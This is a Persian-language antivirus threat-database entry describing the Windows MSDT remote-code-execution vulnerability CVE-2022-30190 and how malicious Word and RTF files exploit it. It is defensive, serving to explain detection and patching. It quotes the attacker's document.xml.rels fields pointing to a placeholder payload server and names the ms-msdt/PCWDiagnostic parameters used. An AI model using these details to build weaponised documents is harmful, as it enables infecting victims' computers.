Exploit.Win32.CVE-2022-30190.a | بانک اطلاعات تهدیدات بدافزاری پادویش

شرح کلی

نوع: آسیب‌پذیری (Vulnerability)
پلتفرم آسیب‌پذیر: ویندوز
نسخه‌های آسیب‌پذیر: تمامی نسخه‌های ویندوز
تاریخ ارائه وصله امنیتی توسط مایکروسافت: ۱۴ ژوئن ۲۰۲۲ (۲۴ خرداد ۱۴۰۱)
ماژول آسیب‌پذیر: Microsoft Support Diagnostic Tool (MSDT)
نوع آسیب‌پذیری: اجرای کد از راه دور (Remote Code Execution)
درجه خطر: بالا (CVSS:3.1 7.8 / 7.0)

آسیب‌پذیری (Vulnerability) چیست؟

آسیب‌پذیری در امنیت رایانه به معنای وجود یک نقطه ضعف در یک پلتفرم است که می‌تواند توسط یک فرد نفوذگر و یا بدافزار مورد سوءاستفاده قرار گیرد و موجب دسترسی غیرمجاز به سیستم رایانه‌ای شود. آسیب‌پذیری‌ها به نفوذگران اجازه اجرای دستورات، دسترسی به حافظه سیستم، نصب بدافزار و سرقت، تخریب و تغییر اطلاعات با اهمیت سازمان‌ها و افراد را می‌دهند.

نحوه سوءاستفاده از آسیب‌پذیری CVE-2022-30190

فایل doc/docx حاوی XML مخرب (document.xml.rels) و یا RTF مخرب، با سوءاستفاده از آسیب پذیری MSDT اقدام به دانلود و اجرای payload مخرب خود می‌نماید. در نتیجه، فرد نفوذگر برای نفوذ ابتدا باید کاربر قربانی را به نحوی متقاعد به اجرای document مخرب کند که این کار معمولا از طریق ارسال ایمیل اتفاق می‌افتد. در بحث فایل‌های RTF، صرفا مشاهده فایل از طریق preview pane کافیست و بدون باز کردن فایل نیز فعالیت مخرب خود را انجام می‌دهد.

توضیحات فنی

جزئیات آسیب‌پذیری برای فایل‌های doc/docx

در صورت استخراج فایل مخرب، در مسیر word/_rels/document.xml.rels با محتوایی همانند تصویر زیر مواجه می‌شویم:

file content

تصویر 1: محتوای فایل xml مخرب

موارد ایجاد شده توسط مهاجم به شرح زیر است:

1. Type=”http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject”

2. Target = “http://<payload_server>/payload.html!”

3. TargetMode = “External”

اقدامات فوق سبب می‌شود تا Microsoft office به صورت خودکار لینک حاوی پیلود مخرب را که قالبی شبیه به تصویر زیر دارد از سرور مخرب (مورد 2) دانلود کرده و توسط پردازه msdt.exe که به عنوان زیر مجموعه فایل آفیسِ باز شده بالا می‌آید، اجرا نماید.

Malicious payload

تصویر 2: قالب پیلود مخرب که لینک آن در فایل xml یا RTF قرار گرفته و پس از کلیک توسط کاربر دانلود و اجرا می‌شود.

‫تصویر فوق بخش اصلی بهره برداری از این آسیب پذیری محسوب می‌شود که از یک شِما برای ms-msdt، پکیج PCWDiagnostic را با پارامترهای IT_BrowseForFile را به منظور فراخوانی پیلود مخرب استفاده می‌نماید.

جزئیات آسیب پذیری برای فایل‌های RTF

تغییراتی که در یک فایل RTF حاوی این آسیب پذیری ایجاد می‌شود، به صورت زیر می‌باشد:

RTF

تصویر 3: بخش مخرب موجود در فایل RTF

تذکر: لینک موجود در تصویر فوق به پیلود مخرب (تصویر 2) اشاره دارد.

پیشنهادات امنیتی

روش مقابله و پاکسازی سیستم

آنتی ویروس پادویش این دسته از آسیب پذیری‌ها را شناسایی کرده و از سیستم حذف می‌کند. بخش جلوگیری از نفوذ (IPS) آنتی‌ویروس پادویش، تلاش‌ها برای ایجاد آلودگی‌ به واسطه وجود این آسیب‌پذیری‌ را شناسایی و از ورود آنها به سیستم قربانی جلوگیری می‌کند.‬‬‬ جهت پیشگیری از آلودگی‌های احتمالی توسط فایل‌هایی که از این آسیب پذیری استفاده می‌کنند، پیشنهاد می‌شود از وصله امنیتی ارائه شده توسط مایکروسافت استفاده کنید.